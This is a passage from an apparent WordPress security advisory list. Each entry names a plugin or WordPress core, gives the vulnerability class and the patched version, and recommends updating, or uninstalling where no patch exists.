Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Booking Calendar

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Cookie Notice & Consent

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Checklist

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Cardinity Payment Gateway for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: Surbma | GDPR Proof Cookie Consent & Notice Bar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 17.6.0
Recommended Action: Update to version 17.6.0, or a newer patched version

Plugin: TS Webfonts for さくらのレンタルサーバ

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Stored Cross-Site Scripting
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: Gallery Bank – WordPress Photo Gallery Plugin

Vulnerability: SQL Injection
Patched Version: 3.0.330
Recommended Action: Update to version 3.0.330, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: Modal Window – create popup modal window

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.3.6
Recommended Action: Update to version 5.3.6, or a newer patched version

Plugin: Comment Highlighter

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: InstaWP Connect – 1-click WP Staging & Migration

Vulnerability: Missing Authorization to Unauthenticated Post/Taxonomy/User Add/Change/Delete, Customizer Setting Change, Plugin Installation/Activation/Deactivation via events_receiver
Patched Version: 0.0.9.19
Recommended Action: Update to version 0.0.9.19, or a newer patched version

Plugin: Maintenance Mode by Supsystic

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Permalink Manager Lite

Vulnerability: No subtitle
Patched Version: 2.2.15
Recommended Action: Update to version 2.2.15, or a newer patched version

Plugin: wordcamp-talks

Vulnerability: CSV Injection
Patched Version: 1.0.0-beta3
Recommended Action: Update to version 1.0.0-beta3, or a newer patched version

Plugin: WatuPRO

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.9.0.8
Recommended Action: Update to version 4.9.0.8, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Arbitrary File Upload
Patched Version: 2.6.1.4
Recommended Action: Update to version 2.6.1.4, or a newer patched version

Plugin: WordPress Online Booking and Scheduling Plugin – Bookly

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 22.5
Recommended Action: Update to version 22.5, or a newer patched version

Plugin: Stamped.io Product Reviews & UGC for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Missing Authorization
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: Smooth Scroll Links [SSL]

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Clean Login

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.13.7
Recommended Action: Update to version 1.13.7, or a newer patched version

Plugin: WPML

Vulnerability: Authorization Bypass
Patched Version: 3.1.9.1
Recommended Action: Update to version 3.1.9.1, or a newer patched version

Plugin: WordPress PDF Light Viewer Plugin

Vulnerability: Authenticated Command Injection
Patched Version: 1.4.12
Recommended Action: Update to version 1.4.12, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Unauthenticated HTML Injection leading to Spam Emails
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Cross-Site Request Forgery to Arbitrary Quiz Deletion and Copying
Patched Version: 1.3.2.5
Recommended Action: Update to version 1.3.2.5, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: Login using WordPress Users ( WP as SAML IDP )

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.13.4
Recommended Action: Update to version 1.13.4, or a newer patched version

Plugin: Add Shortcodes Actions And Filters

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.10
Recommended Action: Update to version 2.10, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.9.8
Recommended Action: Update to version 3.9.8, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting via Form Name
Patched Version: 6.8.9
Recommended Action: Update to version 6.8.9, or a newer patched version

Plugin: WP Abstracts

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: WP Survey Plus

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.4.22
Recommended Action: Update to version 3.4.22, or a newer patched version

Plugin: Fast & Effective Popups & Lead-Generation for WordPress – HollerBox

Vulnerability: Authenticated (edit_popups+) SQL Injection
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 1.5.64
Recommended Action: Update to version 1.5.64, or a newer patched version

Plugin: Team – Team Members Showcase Plugin

Vulnerability: WordPress Team Member Showcase Plugin <= 4.1.1
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: Formzu WP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.12.0
Recommended Action: Update to version 2.12.0, or a newer patched version

Plugin: Smarty for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Paytium: Mollie payment forms & donations

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: pootle button

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Authenticated Stored Cross-Site Scripting via Shortcode
Patched Version: 4.16.3
Recommended Action: Update to version 4.16.3, or a newer patched version

Plugin: Menu Swapper

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Andrea Pernici News Sitemap for Google

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Share Buttons Plugin – AddThis

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 5.0.13
Recommended Action: Update to version 5.0.13, or a newer patched version

Plugin: Animate It!

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: GroupDocs.Comparison for Cloud

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_remove_cdn_integration_ajax_request_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Network Publisher

Vulnerability: Cross-Site Scripting
Patched Version: 5.1
Recommended Action: Update to version 5.1, or a newer patched version

Plugin: Webinar Solution: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.14.3
Recommended Action: Update to version 2.14.3, or a newer patched version

Plugin: Backend Localization

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: wpCentral

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress HTTPS (SSL)

Vulnerability: Missing Authorization to Settings Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: bbp style pack

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.5.6
Recommended Action: Update to version 5.5.6, or a newer patched version

Plugin: Limit Login Attempts (Spam Protection)

Vulnerability: Unauthenticated SQL Injection
Patched Version: 5.1
Recommended Action: Update to version 5.1, or a newer patched version

Plugin: Calendar Event Multi View

Vulnerability: Missing Authentication leading to Authenticated (Subscriber+) Private Form Submission
Patched Version: 1.4.11
Recommended Action: Update to version 1.4.11, or a newer patched version

Plugin: WP-Banners-Lite

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Woocommerce ESTO

Vulnerability: Cross-Site Request Forgery via saveSetting
Patched Version: 2.23.2
Recommended Action: Update to version 2.23.2, or a newer patched version

Plugin: WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.44
Recommended Action: Update to version 2.0.44, or a newer patched version

Plugin: Trending/Popular Post Slider and Widget

Vulnerability: Cross-Site Request Forgery via wtpsw_post_view_count
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: WP Reroute Email

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission – WP User Frontend

Vulnerability: Privilege Escalation
Patched Version: 3.5.29
Recommended Action: Update to version 3.5.29, or a newer patched version

Plugin: Product Catalog Simple

Vulnerability: Cross-Site Request Forgery via ic_system_status
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: IgniteUp – Coming Soon and Maintenance Mode

Vulnerability: Unauthenticated Arbitrary File Deletion
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Insufficient Authorization to Comment Submission on Deleted Posts
Patched Version: 7.6.11
Recommended Action: Update to version 7.6.11, or a newer patched version

Plugin: Adning Advertising

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: WD Instagram Feed Premium

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: ImageMagick Engine

Vulnerability: Cross-Site Request Forgery to PHAR Deserialization
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Product Delivery Date for WooCommerce – Lite

Vulnerability: Missing Authorization
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Canto

Vulnerability: Blind Server-Side Request Forgery via get.php
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Missing Authorization in ‘regenerateSitemaps’
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Quiz Tool Lite

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Sticky Popup

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPCS – WordPress Currency Switcher Professional

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Injection Guard

Vulnerability: Cross-Site Request Forgery via ig_update
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: TerraClassifieds – Simple Classifieds Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Subscription

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: MainWP Clone Extension

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: WP Time Slots Booking Form

Vulnerability: Improper Authorization Checks
Patched Version: 1.1.83
Recommended Action: Update to version 1.1.83, or a newer patched version

Plugin: Social Feed | All social media in one place

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All Bootstrap Blocks

Vulnerability: Cross-Site Request Forgery to Plugin Settings Reset
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: Interactive Medical Drawing of Human Body

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Thank You Counter Button

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Companion Sitemap Generator – HTML & XML

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.5.3
Recommended Action: Update to version 4.5.3, or a newer patched version

Plugin: WP eCommerce

Vulnerability: SQL Injection
Patched Version: 3.8.7.6
Recommended Action: Update to version 3.8.7.6, or a newer patched version

Plugin: CommentTweets

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Private Messages

Vulnerability: Authenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: OneLogin SAML SSO

Vulnerability: Distributed Denial-of-Service
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: RSVP and Event Management

Vulnerability: Unauthenticated Sensitive Information Disclosure
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Simple Mail Address Encoder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Button Generator – easily Button Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Educare – Students & Result Management System

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in savetmplfile function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: WP Symposium

Vulnerability: Unauthenticated SQL Injection
Patched Version: 15.8
Recommended Action: Update to version 15.8, or a newer patched version

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: WordPress Related Posts

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: uContext for Clickbank

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Forms for Mailchimp

Vulnerability: Reflected Cross-Site Scripting via ‘sql_error’
Patched Version: 6.8.9
Recommended Action: Update to version 6.8.9, or a newer patched version

Plugin: WPSmartContracts

Vulnerability: Authenticated (Author+) SQL Injection
Patched Version: 1.3.12
Recommended Action: Update to version 1.3.12, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Privilege Escalation via Arbitrary User Meta Updates
Patched Version: 2.6.7
Recommended Action: Update to version 2.6.7, or a newer patched version

Plugin: 微信打赏(Wechat Reward)

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Availability Calendar

Vulnerability: Cross-Site Request Forgery via add_availability_calendar_create_admin_page()
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Powie's WHOIS Domain Check

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 0.9.32
Recommended Action: Update to version 0.9.32, or a newer patched version

Plugin: ToTop Link

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mondial Relay & Chronopost plugin for WooCommerce – WCMultiShipping

Vulnerability: Missing Authorization to Log Export
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: Customify – Intuitive Website Styling

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 2.10.5
Recommended Action: Update to version 2.10.5, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Cross-Site Request Forgery to WPForm/Blocks Import
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: File Read / Directory Traversal
Patched Version: 0.9.4
Recommended Action: Update to version 0.9.4, or a newer patched version

Plugin: WP-Paginate

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: IP Spoofing
Patched Version: 5.2.5.1
Recommended Action: Update to version 5.2.5.1, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service via XML
Patched Version: 3.7.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.4, 3.8.4, 3.9.2

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: SQL Injection
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Referrer Detector

Vulnerability: PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Germanized for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Scripting
Patched Version: 7.1.19
Recommended Action: Update to version 7.1.19, or a newer patched version

Plugin: WP Extended Search

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Database for Contact Form 7, WPforms, Elementor forms

Vulnerability: Authenticated (Contributor+) SQL Injection via shortcode
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Post Gallery

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Responsive Lightbox & Gallery

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via name
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: YaySMTP – WP SMTP Plugin with Full Email Log & 15+ SMTP Services

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 3.7.30
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.30, 3.8.30, 3.9.28, 4.0.27, 4.1.27, 4.2.24, 4.3.20, 4.4.19, 4.5.18, 4.6.15, 4.7.14, 4.8.10, 4.9.11, 5.0.6, 5.1.2, 5.2.3

Plugin: Appointment Booking Calendar

Vulnerability: SQL Injection
Patched Version: 1.1.24
Recommended Action: Update to version 1.1.24, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Custom Registration Forms, User Registration and User Login Plugin <= 4.6.0.2
Patched Version: 4.6.0.3
Recommended Action: Update to version 4.6.0.3, or a newer patched version

Plugin: Task Manager Pro – Task Management Plugin For WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: StatPressCN

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: directories

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.46
Recommended Action: Update to version 1.3.46, or a newer patched version

Plugin: This Day In History

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Relevanssi – A Better Search

Vulnerability: SQL Injection
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Easy WP SMTP – WordPress SMTP and Email Logs: Gmail, Office 365, Outlook, Custom SMTP, and more

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: PDF Viewer & 3D PDF Flipbook – DearPDF

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-CommentNavi

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.12.2
Recommended Action: Update to version 1.12.2, or a newer patched version

Plugin: Codup WooCommerce Dynamic Pricing Table View

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.1.5
Recommended Action: Update to version 1.2.1.5, or a newer patched version

Plugin: Ultimate Taxonomy Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Page Generator

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Uploading SVG, WEBP and ICO files

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Social Sharing Plugin – Social Warfare

Vulnerability: Missing Authorization
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: cformsII

Vulnerability: CAPTCHA Bypass
Patched Version: 14.11
Recommended Action: Update to version 14.11, or a newer patched version

Plugin: Mimetic Books

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BuddyPress

Vulnerability: Insufficient Input Validation
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: WP Photo Album Plus

Vulnerability: Cross-Site Scripting
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: LayerSlider

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: Aspose.Words – Import and Export word documents

Vulnerability: Arbitrary File Download
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: IMDB Profile Widget

Vulnerability: Local File Inclusion
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Laposta Signup Embed

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Stored Cross-Site Scripting
Patched Version: 7.3.7
Recommended Action: Update to version 7.3.7, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Shortcodes
Patched Version: 3.7.11
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.11, 3.8.11, 3.9.9, 4.0.8, 4.1.8, 4.2.5, 4.3.1

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Cross-Site Request Forgery to Plugin Settings Change
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Local File Inclusion
Patched Version: 9.4.3
Recommended Action: Update to version 9.4.3, or a newer patched version

Plugin: GamiPress – Gamification plugin to reward points, achievements, badges & ranks in WordPress

Vulnerability: Missing Authorization to User Points Updates
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Zippy

Vulnerability: Authenticated (Contributor+) Sensitive Information Disclosure
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Orbit Fox by ThemeIsle

Vulnerability: Authenticated (Author+) Server-Side Request Forgery via URL
Patched Version: 2.10.24
Recommended Action: Update to version 2.10.24, or a newer patched version

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: Missing Authorization
Patched Version: 1.3.72
Recommended Action: Update to version 1.3.72, or a newer patched version

Plugin: WooCommerce Stripe Payment Gateway

Vulnerability: Missing Authorization
Patched Version: 7.4.1
Recommended Action: Update to version 7.4.1, or a newer patched version

Plugin: Tawk.To Live Chat

Vulnerability: Missing Authorization to Visitor Monitoring & Chat Removal
Patched Version: 0.6.0
Recommended Action: Update to version 0.6.0, or a newer patched version

Plugin: track-that-stat

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: AppPresser – Mobile App Framework

Vulnerability: Insecure Password Reset Mechanism
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: Gutenverse – Ultimate Block Addons and Page Builder for Site Editor

Vulnerability: Missing Authorization via ‘data/update’ API Endpoint
Patched Version: 1.8.6
